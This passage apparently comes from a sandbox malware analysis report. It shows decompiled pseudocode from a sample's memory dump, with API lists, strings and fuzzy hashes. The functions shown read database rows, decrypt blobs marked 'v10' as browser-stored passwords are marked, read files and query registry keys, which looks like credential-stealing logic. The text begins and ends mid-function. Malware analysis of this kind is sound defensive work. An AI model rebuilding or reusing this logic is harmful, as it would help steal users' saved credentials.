					_t109 = _t109 + 0x30;
					_v544 = _t62;
				}
				__eflags = _a28;
				if(_a28 != 0) {
					E00413800(_v8,  &_v552,  &_v556);
					E004137E0(_a24,  &_v540, _v552, _v556);
					return E0040B720( &_v8, 4);
				}
				return _t62;
			}

0x00406145
0x00406156
0x0040615f
0x00406165
0x0040616c
0x00406172
0x00406175
0x00406179
0x00406194
0x0040617b
0x00406184
0x00406189
0x0040618c
0x0040618c
0x00406199
0x004061a2
0x004061bc
0x004061c4
0x004061cd
0x004061ea
0x004061f2
0x004061fb
0x00406218
0x00406220
0x00406229
0x00406246
0x0040625c
0x00406261
0x00406264
0x0040626a
0x0040626a
0x00406271
0x00000000
0x00000000
0x0040629e
0x004062b4
0x004062b9
0x004062bc
0x004062bc
0x004062c4
0x004062c8
0x004062dc
0x004062fd
0x00000000
0x0040630b
0x00406313

APIs

wsprintfA.USER32 ref: 0040616C
lstrcpy.KERNEL32(?,00000000), ref: 004061BC
lstrcpy.KERNEL32(?,00000000), ref: 004061EA
lstrcpy.KERNEL32(?,00000000), ref: 00406218
lstrcpy.KERNEL32(?,00000000), ref: 00406246

Strings

vb, xrefs: 004061FB

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcpy$wsprintf
String ID: vb
API String ID: 553454533-1055410840
Opcode ID: 339612030bc37ffdbe752cae41bfb9cb2c421f843c437781f6b1cccd39fe225c
Instruction ID: 97311c7f6f8bc2fe4aa679da1049fe92a67fa3411fccba4dc07eac06f42ff0f5
Opcode Fuzzy Hash: 339612030bc37ffdbe752cae41bfb9cb2c421f843c437781f6b1cccd39fe225c
Instruction Fuzzy Hash: 365177F690010CBBC715EF94DC46FDB7378AB5C304F0445A9F609A7181EA78AA94CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409590, Relevance: 9.1, APIs: 6, Instructions: 94
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00409590(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				CHAR* _t27;
				void* _t30;
				void* _t32;
				void* _t38;
				intOrPtr _t44;
				intOrPtr _t58;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t70;

				E0040B720( &_v276, 0x104);
				_t27 =  *0x41a07c; // 0x628ea0
				wsprintfA( &_v276, _t27, _a12, _a8);
				_t58 =  *0x41a294; // 0x626d90
				_v280 = _t58;
				_t30 =  *0x41a830(_a4,  &_v8);
				_t66 = _t64 + 0x18;
				if(_t30 == 0) {
					_t32 =  *0x41a7e8(_v8, _v280, 0xffffffff,  &_v284, 0);
					_t67 = _t66 + 0x14;
					if(_t32 != 0) {
						L6:
						 *0x41a808(_v284);
						return  *0x41a834(_v8);
					}
					_v288 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t38 =  *0x41a804(_v284);
						_t70 = _t67 + 4;
						if(_t38 != 0x64) {
							break;
						}
						_t44 =  *0x41a820(_v284, 0);
						_t67 = _t70 + 8;
						_v292 = _t44;
						 *0x41aa24(_v288, _v292);
						 *0x41aa24(_v288, "\n");
					}
					E004137E0(_a16,  &_v276, _v288,  *0x41a908(_v288));
					_t67 = _t70 + 0x10;
					E0040B720( &_v288, 4);
					goto L6;
				}
				return _t30;
			}

0x004095a5
0x004095b2
0x004095bf
0x004095c8
0x004095ce
0x004095dc
0x004095e2
0x004095e7
0x00409603
0x00409609
0x0040960e
0x004096b9
0x004096c0
0x00000000
0x004096d3
0x00409628
0x0040962e
0x00409635
0x0040963b
0x00409641
0x00000000
0x00000000
0x0040964c
0x00409652
0x00409655
0x00409669
0x0040967b
0x0040967b
0x004096a3
0x004096a8
0x004096b4
0x00000000
0x004096b4
0x004096d9

APIs

wsprintfA.USER32 ref: 004095BF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040961B
RtlAllocateHeap.NTDLL(00000000), ref: 00409622
lstrcat.KERNEL32(?,?), ref: 00409669
lstrcat.KERNEL32(?,00418BC4), ref: 0040967B
lstrlen.KERNEL32(?), ref: 0040968A

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 2177231248-0
Opcode ID: 118ae59d0f25a22a12b371e08b370f69fa651aeb9a5a1d3569fc809063f8c249
Instruction ID: 0f4305f0ea4e8f12541be8dfce34b0e085d7d14125619b5af487afca8afb3160
Opcode Fuzzy Hash: 118ae59d0f25a22a12b371e08b370f69fa651aeb9a5a1d3569fc809063f8c249
Instruction Fuzzy Hash: 263186B1900108ABCB14DFA4DD46FDA73B8AF4C704F0085A9F70997281D635DEA1CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00408510, Relevance: 9.1, APIs: 6, Instructions: 92
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00408510(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				char _v8;
				char _v276;
				char _v280;
				char _v284;
				intOrPtr _v288;
				CHAR* _t25;
				void* _t28;
				void* _t30;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t56;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t67;

				E0040B720( &_v276, 0x104);
				_t25 =  *0x41a07c; // 0x628ea0
				wsprintfA( &_v276, _t25, _a12, _a8);
				_t28 =  *0x41a830(_a4,  &_v8);
				_t63 = _t61 + 0x18;
				if(_t28 == 0) {
					_t56 =  *0x41a430; // 0x628e20
					_t30 =  *0x41a7e8(_v8, _t56, 0xffffffff,  &_v280, 0);
					_t64 = _t63 + 0x14;
					if(_t30 != 0) {
						L6:
						 *0x41a808(_v280);
						return  *0x41a834(_v8);
					}
					_v284 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f);
					while(1) {
						_t36 =  *0x41a804(_v280);
						_t67 = _t64 + 4;
						if(_t36 != 0x64) {
							break;
						}
						_t42 =  *0x41a820(_v280, 0);
						_t64 = _t67 + 8;
						_v288 = _t42;
						 *0x41aa24(_v284, _v288);
						 *0x41aa24(_v284, "\n");
					}
					E004137E0(_a24,  &_v276, _v284,  *0x41a908(_v284));
					_t64 = _t67 + 0x10;
					E0040B720( &_v284, 4);
					goto L6;
				}
				return _t28;
			}

0x00408525
0x00408532
0x0040853f
0x00408550
0x00408556
0x0040855b
0x0040856c
0x00408577
0x0040857d
0x00408582
0x0040862d
0x00408634
0x00000000
0x00408647
0x0040859c
0x004085a2
0x004085a9
0x004085af
0x004085b5
0x00000000
0x00000000
0x004085c0
0x004085c6
0x004085c9
0x004085dd
0x004085ef
0x004085ef
0x00408617
0x0040861c
0x00408628
0x00000000
0x00408628
0x0040864d

APIs

wsprintfA.USER32 ref: 0040853F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040858F
RtlAllocateHeap.NTDLL(00000000), ref: 00408596
lstrcat.KERNEL32(?,?), ref: 004085DD
lstrcat.KERNEL32(?,00418BC4), ref: 004085EF
lstrlen.KERNEL32(?), ref: 004085FE

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heaplstrcat$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 2177231248-0
Opcode ID: d86f877f6af101afd853e83cc45e0c7f259d9c1cd7a3b3c2d6ea3d455249c9be
Instruction ID: 16a89e7602ce9a9af0cb90aa00b31cd04fc627f3dd9fe4cd639e4c9769f6db21
Opcode Fuzzy Hash: d86f877f6af101afd853e83cc45e0c7f259d9c1cd7a3b3c2d6ea3d455249c9be
Instruction Fuzzy Hash: 0F3198B1900108ABCB14EFA4DD46EDA7378AF48705F0085A8F719D7191DA35DAA1CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407380, Relevance: 9.1, APIs: 6, Instructions: 77
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00407380(CHAR* _a4, void** _a8, long* _a12) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				intOrPtr _v24;
				long _v28;
				long _v32;

				_v8 = 0;
				_v16 = 0;
				_v16 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_v16 == 0 || _v16 == 0xffffffff) {
					L12:
					return _v8;
				} else {
					_push( &_v28);
					_push(_v16);
					if( *0x41a868() != 0 && _v24 == 0) {
						 *_a12 = _v28;
						 *_a8 = LocalAlloc(0x40,  *_a12);
						if( *_a8 != 0) {
							if(ReadFile(_v16,  *_a8,  *_a12,  &_v12, 0) == 0 ||  *_a12 != _v12) {
								_v32 = 0;
							} else {
								_v32 = 1;
							}
							_v8 = _v32;
							if(_v8 == 0) {
								LocalFree( *_a8);
							}
						}
					}
					CloseHandle(_v16);
					goto L12;
				}
			}

0x00407386
0x0040738d
0x004073ad
0x004073b4
0x0040745b
0x00407461
0x004073c4
0x004073c7
0x004073cb
0x004073d4
0x004073e2
0x004073f5
0x004073fd
0x0040741d
0x00407432
0x00407429
0x00407429
0x00407429
0x0040743c
0x00407443
0x0040744b
0x0040744b
0x00407443
0x004073fd
0x00407455
0x00000000
0x00407455

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,004076B0,00000000,?), ref: 004073A7
GetFileSizeEx.KERNEL32(000000FF,004076B0,?,004076B0,00000000,?), ref: 004073CC
LocalAlloc.KERNEL32(00000040,?,?,004076B0), ref: 004073EC
ReadFile.KERNEL32(000000FF,?,000000FF,?,00000000,?,004076B0), ref: 00407415
LocalFree.KERNEL32(?), ref: 0040744B
CloseHandle.KERNEL32(000000FF,?,004076B0,00000000,?), ref: 00407455

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 4e0f13bd6030b2d39f57ca96a85e1861cdcda2e923e2d8cd49f8341b4bf1824a
Instruction ID: af94470c476782e88e9ea84d45e590fd848c7c035798b2791f751b67d2b5900f
Opcode Fuzzy Hash: 4e0f13bd6030b2d39f57ca96a85e1861cdcda2e923e2d8cd49f8341b4bf1824a
Instruction Fuzzy Hash: 1A31DBB4A04209EFDB14DF94C888BAEBBB5FF48310F108169E915AB3D0C778AA55CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACE0() {
				struct _SYSTEMTIME _v20;
				void* _v24;

				_v24 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				GetLocalTime( &_v20);
				wsprintfA(_v24, "%d/%d/%d %d:%d:%d", _v20.wDay & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wYear & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				return _v24;
			}

0x0040acfa
0x0040ad01
0x0040ad2e
0x0040ad3d

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040ACED
RtlAllocateHeap.NTDLL(00000000), ref: 0040ACF4
GetLocalTime.KERNEL32(?,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040AD01
wsprintfA.USER32 ref: 0040AD2E

Strings

%d/%d/%d %d:%d:%d, xrefs: 0040AD25

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: %d/%d/%d %d:%d:%d
API String ID: 377395780-1073349071
Opcode ID: 8e285d3c0eb36019000bcc5d6a07b144cb12c9e005f16ceaedbebfc32425e432
Instruction ID: d54db4264a189618d18ac0c6d63712439e5e5702a0e8137862d75125f6334758
Opcode Fuzzy Hash: 8e285d3c0eb36019000bcc5d6a07b144cb12c9e005f16ceaedbebfc32425e432
Instruction Fuzzy Hash: 2FF06DB5800118BBCB10DBE99D489FFB3B8BF0CB02F00415AFA41A1180E6388A90D776

Uniqueness

Uniqueness Score: -1.00%

Function 00404970, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00404970(void* __ecx, void* __eflags, char* _a4) {
				intOrPtr _v56;
				char* _v60;
				char _v64;
				char _v132;

				E0040B720( &_v132, 0x40);
				E0040B720( &_v64, 0x3c);
				_v64 = 0x3c;
				_v60 =  &_v132;
				_v56 = 0x40;
				_push( &_v64);
				if(InternetCrackUrlA(_a4,  *0x41a908(), _a4, 0x10000000) == 0) {
					return 0x418b7c;
				}
				return _v60;
			}

0x0040497f
0x0040498a
0x0040498f
0x00404999
0x0040499c
0x004049a6
0x004049c3
0x00000000
0x004049cc
0x00000000

APIs

lstrlen.KERNEL32(?,10000000,0000003C,?,0000003C,?,00000040), ref: 004049B0
InternetCrackUrlA.WININET(?,00000000), ref: 004049BB

Strings

@, xrefs: 0040499C
http, xrefs: 004049CC
<, xrefs: 0040498F

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: CrackInternetlstrlen
String ID: <$@$http
API String ID: 1274457161-26727890
Opcode ID: 953279faeda4fbfed10a865a9ed3943784a545a7601c943f1e9572a566367c12
Instruction ID: e6804194f0461931acba1e2b3008128b19c1605eb91d96f529587f083f9a09b0
Opcode Fuzzy Hash: 953279faeda4fbfed10a865a9ed3943784a545a7601c943f1e9572a566367c12
Instruction Fuzzy Hash: 84F012F590020CABDB04DFA5E885FEE7B7CEB44344F008529FA04AB190DB78A5448B99

Uniqueness

Uniqueness Score: -1.00%

Function 00411B30, Relevance: 7.7, APIs: 5, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B30(intOrPtr __ecx, signed int _a4, long _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				signed int _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _t90;
				intOrPtr _t112;
				intOrPtr _t136;
				intOrPtr _t141;

				_v24 = __ecx;
				if( *(_v24 + 4) != 0 ||  *(_v24 + 0xc) != 0 ||  *((intOrPtr*)(_v24 + 0x20)) != 0 ||  *((intOrPtr*)(_v24 + 0x18)) != 0 ||  *((intOrPtr*)(_v24 + 0x14)) != 0 || ( *(_v24 + 0x2c) & 0x000000ff) != 0) {
					return 0x1000000;
				} else {
					__eflags = _a12 - 1;
					if(_a12 != 1) {
						__eflags = _a12 - 2;
						if(__eflags != 0) {
							__eflags = _a12 - 3;
							if(_a12 != 3) {
								return 0x10000;
							}
							_v20 = _a8;
							__eflags = _v20;
							if(_v20 != 0) {
								__eflags = _a4;
								if(_a4 == 0) {
									 *(_v24 + 0xc) = CreateFileMappingW(0xffffffff, 0, 4, 0, _v20, 0);
									_t90 = _v24;
									__eflags =  *(_t90 + 0xc);
									if( *(_t90 + 0xc) != 0) {
										 *((intOrPtr*)(_v24 + 0x20)) = MapViewOfFile( *(_v24 + 0xc), 0xf001f, 0, 0, _v20);
										_t136 = _v24;
										__eflags =  *(_t136 + 0x20);
										if( *(_t136 + 0x20) != 0) {
											L25:
											 *((char*)(_v24 + 0x1c)) = 1;
											 *(_v24 + 0x24) = 0;
											 *(_v24 + 0x28) = _v20;
											return 0;
										}
										CloseHandle( *(_v24 + 0xc));
										 *(_v24 + 0xc) = 0;
										return 0x300;
									}
									return 0x300;
								}
								 *((intOrPtr*)(_v24 + 0x20)) = _a4;
								goto L25;
							}
							return 0x30000;
						}
						_v16 = _a4;
						 *(_v24 + 4) = CreateFileW(E0040B5C0(__eflags, _v16), 0x40000000, 0, 0, 2, 0x80, 0);
						_t141 = _v24;
						__eflags =  *((intOrPtr*)(_t141 + 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t141 + 4)) != 0xffffffff) {
							 *((char*)(_v24 + 0x1c)) = 1;
							 *(_v24 + 0x10) = 0;
							 *((char*)(_v24 + 8)) = 1;
							return 0;
						}
						 *(_v24 + 4) = 0;
						return 0x200;
					}
					_v12 = _a4;
					 *(_v24 + 4) = _v12;
					 *((char*)(_v24 + 8)) = 0;
					_v8 = SetFilePointer( *(_v24 + 4), 0, 0, 1);
					__eflags = _v8 - 0xffffffff;
					 *((char*)(_v24 + 0x1c)) = 0 | _v8 != 0xffffffff;
					_t112 = _v24;
					__eflags =  *(_t112 + 0x1c) & 0x000000ff;
					if(( *(_t112 + 0x1c) & 0x000000ff) == 0) {
						 *(_v24 + 0x10) = 0;
					} else {
						 *(_v24 + 0x10) = _v8;
					}
					return 0;
				}
			}

0x00411b36
0x00411b40
0x00000000
0x00411b7b
0x00411b7b
0x00411b7f
0x00411be8
0x00411bec
0x00411c60
0x00411c64
0x00000000
0x00411d22
0x00411c6d
0x00411c70
0x00411c74
0x00411c80
0x00411c84
0x00411ca8
0x00411cab
0x00411cae
0x00411cb2
0x00411cd8
0x00411cdb
0x00411cde
0x00411ce2
0x00411d02
0x00411d05
0x00411d0c
0x00411d19
0x00000000
0x00411d1c
0x00411ceb
0x00411cf4
0x00000000
0x00411cfb
0x00000000
0x00411cb4
0x00411c8c
0x00000000
0x00411c8c
0x00000000
0x00411c76
0x00411bf1
0x00411c1c
0x00411c1f
0x00411c22
0x00411c26
0x00411c3f
0x00411c46
0x00411c50
0x00000000
0x00411c54
0x00411c2b
0x00000000
0x00411c32
0x00411b84
0x00411b8d
0x00411b93
0x00411baa
0x00411baf
0x00411bb9
0x00411bbc
0x00411bc3
0x00411bc5
0x00411bd5
0x00411bc7
0x00411bcd
0x00411bcd
0x00000000
0x00411bdc

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 00411BA4

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9f40ca25f5a3ec3b26c5a317c37b390bac11bb664fe97661c3bbb8a15347b8b4
Instruction ID: 4806281024cf892df001f217e22b508f46e279854f8b30cdef803a4c5b02db50
Opcode Fuzzy Hash: 9f40ca25f5a3ec3b26c5a317c37b390bac11bb664fe97661c3bbb8a15347b8b4
Instruction Fuzzy Hash: 49611BB4A0020ADFEB14CF54D585BAEB7B1BB04315F208259E9156B3D1D378EE81CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00407230, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 104
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00407230(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				long _v80;
				void* _v84;
				int _v88;
				char _v5092;
				void* _t58;
				void* _t94;

				E004139B0(0x13e0, __ecx);
				if(_a8 < 3) {
					L10:
					return E00407190(_a4, _a8);
				}
				asm("repe cmpsb");
				if(0 != 0) {
					goto L10;
				}
				if(((0 | _a12 != 0x00000000) & (0 | _a16 != 0x00000000)) == 0) {
					return 0x4191a0;
				}
				memset( &_v76, 0, 0x40);
				_v76 = 0x40;
				_v72 = 1;
				_v68 = _a4 + 3;
				_v64 = 0xc;
				_v52 = _v68 + _a8 - 0x13;
				_v48 = 0x10;
				_v80 = _a8 - 3 - _v64 - _v48;
				_t58 = LocalAlloc(0x40, _v80);
				_v84 = _t58;
				if(_v84 == 0) {
					return _t58;
				}
				_v88 = 0;
				_v8 =  *0x41aa60(_a16, _v68 + _v64, _v80,  &_v76, 0, 0, _v84, _v80,  &_v88, 0);
				if(_v8 < 0) {
					return 0x4191a0;
				}
				E0040B720( &_v5092, 0x1388);
				 *0x41aa24( &_v5092, _v84);
				 *((char*)(_t94 + _v88 - 0x13e0)) = 0;
				return  &_v5092;
			}

0x00407238
0x00407243
0x00407364
0x00000000
0x00407371
0x00407258
0x0040725a
0x00000000
0x00000000
0x00407274
0x00000000
0x0040735b
0x00407282
0x0040728a
0x00407291
0x0040729e
0x004072a1
0x004072b2
0x004072b5
0x004072c8
0x004072d1
0x004072d7
0x004072de
0x00000000
0x00407359
0x004072e0
0x00407312
0x00407319
0x00000000
0x00407352
0x00407327
0x00407337
0x00407340
0x00000000

APIs

memset.MSVCRT ref: 00407282
LocalAlloc.KERNEL32(00000040,?), ref: 004072D1
lstrcat.KERNEL32(?,00000000), ref: 00407337

Strings

v10, xrefs: 0040724E
@, xrefs: 0040728A

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: AllocLocallstrcatmemset
String ID: @$v10
API String ID: 4123878530-24753345
Opcode ID: 1d3fa7b3dbb26fb9b049f7610d81cb1348bb2620b3692f3626651eae948cc07e
Instruction ID: 61f64e7557948a46b50732eb2c11968d7e6d1a4f1abee3a4cf4d88c7128a29d2
Opcode Fuzzy Hash: 1d3fa7b3dbb26fb9b049f7610d81cb1348bb2620b3692f3626651eae948cc07e
Instruction Fuzzy Hash: D24150B1E04208EBEB14CFD4D884BDEB7B4FF48344F048169F905AB284D778AA45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5C0, Relevance: 7.6, APIs: 5, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040B5C0(void* __eflags, char* _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _t50;

				_t50 = __eflags;
				_v12 = MultiByteToWideChar(0, 0, _a4,  *0x41a908(0), _a4, 0);
				_v16 = E0040B590( ~(0 | _t50 > 0x00000000) | (_v12 + 0x00000001) * 0x00000002,  ~(0 | _t50 > 0x00000000) | (_v12 + 0x00000001) * 0x00000002);
				_v8 = _v16;
				MultiByteToWideChar(0, 0, _a4,  *0x41a908(_v12), _a4, _v8);
				 *((short*)(_v8 + _v12 * 2)) = 0;
				return _v8;
			}

0x0040b5c0
0x0040b5e3
0x0040b605
0x0040b60b
0x0040b629
0x0040b637
0x0040b641

APIs

lstrlen.KERNEL32(00000080,00000000,00000000,00000002,00000080,00000000), ref: 0040B5CE
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 0040B5DD
new[].LIBCMTD ref: 0040B5FD
lstrlen.KERNEL32(?,?,?), ref: 0040B61A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000), ref: 0040B629

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$new[]
String ID:
API String ID: 4156461339-0
Opcode ID: bcc2d0ee6c9e6d66abe1afca29a4e1eb62fb6bff9411518d967b05a7183445a3
Instruction ID: 4e01539bb3d2c282a73af516c558e114f3eec2120aea2764bae626352bcff954
Opcode Fuzzy Hash: bcc2d0ee6c9e6d66abe1afca29a4e1eb62fb6bff9411518d967b05a7183445a3
Instruction Fuzzy Hash: 000104B5A01108BFDB44DFA8DD46F9E7BB8EF4C304F108158F509DB290D671AA518B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040B240, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B240() {
				void* _v8;
				int _v12;
				void* _v16;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x41a610; // 0x626ef8
				if(RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8) == 0) {
					_t19 =  *0x41a1f4; // 0x629690
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12);
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x0040b246
0x0040b261
0x0040b26f
0x0040b283
0x0040b291
0x0040b29c
0x0040b29c
0x0040b2a6
0x0040b2b2

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B254
RtlAllocateHeap.NTDLL(00000000), ref: 0040B25B
RegOpenKeyExA.ADVAPI32(80000002,00626EF8,00000000,00020119,?), ref: 0040B27B
RegQueryValueExA.ADVAPI32(?,00629690,00000000,00000000,?,000000FF), ref: 0040B29C
RegCloseKey.ADVAPI32(?), ref: 0040B2A6

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: fe3fb2fc6423d3235b7c17287a7d26e133f0254a975ab95cd6796d579850b6b3
Instruction ID: 923f0571c0864a17576b372675103fc2b24e7fdb5a8175b3b8f490f686ce64a9
Opcode Fuzzy Hash: fe3fb2fc6423d3235b7c17287a7d26e133f0254a975ab95cd6796d579850b6b3
Instruction Fuzzy Hash: 70013CB5A41208BBDB00DBE0DD49FEEB7B8EB48700F0085A8FA05A7291D6745A508B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B090, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B090() {
				void* _v8;
				int _v12;
				void* _v16;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x41a3f4; // 0x62a990
				if(RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8) == 0) {
					_t19 =  *0x41a4dc; // 0x6295e8
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12);
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x0040b096
0x0040b0b1
0x0040b0bf
0x0040b0d3
0x0040b0e1
0x0040b0ec
0x0040b0ec
0x0040b0f6
0x0040b102

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B0A4
RtlAllocateHeap.NTDLL(00000000), ref: 0040B0AB
RegOpenKeyExA.ADVAPI32(80000002,0062A990,00000000,00020119,?), ref: 0040B0CB
RegQueryValueExA.ADVAPI32(?,006295E8,00000000,00000000,?,000000FF), ref: 0040B0EC
RegCloseKey.ADVAPI32(?), ref: 0040B0F6

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: df4039e8785e81f7b3363609146fe50ac8c96b68d8374592efb58b1d304fb9ce
Instruction ID: f8a54f85ee1b8cfc6e3047c75a8daca849fb19f3d1c37cdae7566096d66fd71d
Opcode Fuzzy Hash: df4039e8785e81f7b3363609146fe50ac8c96b68d8374592efb58b1d304fb9ce
Instruction Fuzzy Hash: 4C014FB5A41208BFD700DFE0DD49FEEB7B8EB48700F00C568FA05A7291D6745A50CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF80, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AF80() {
				void* _v8;
				int _v12;
				void* _v16;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x41a1a0; // 0x6226a0
				if(RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8) == 0) {
					_t19 =  *0x41a5e4; // 0x628c00
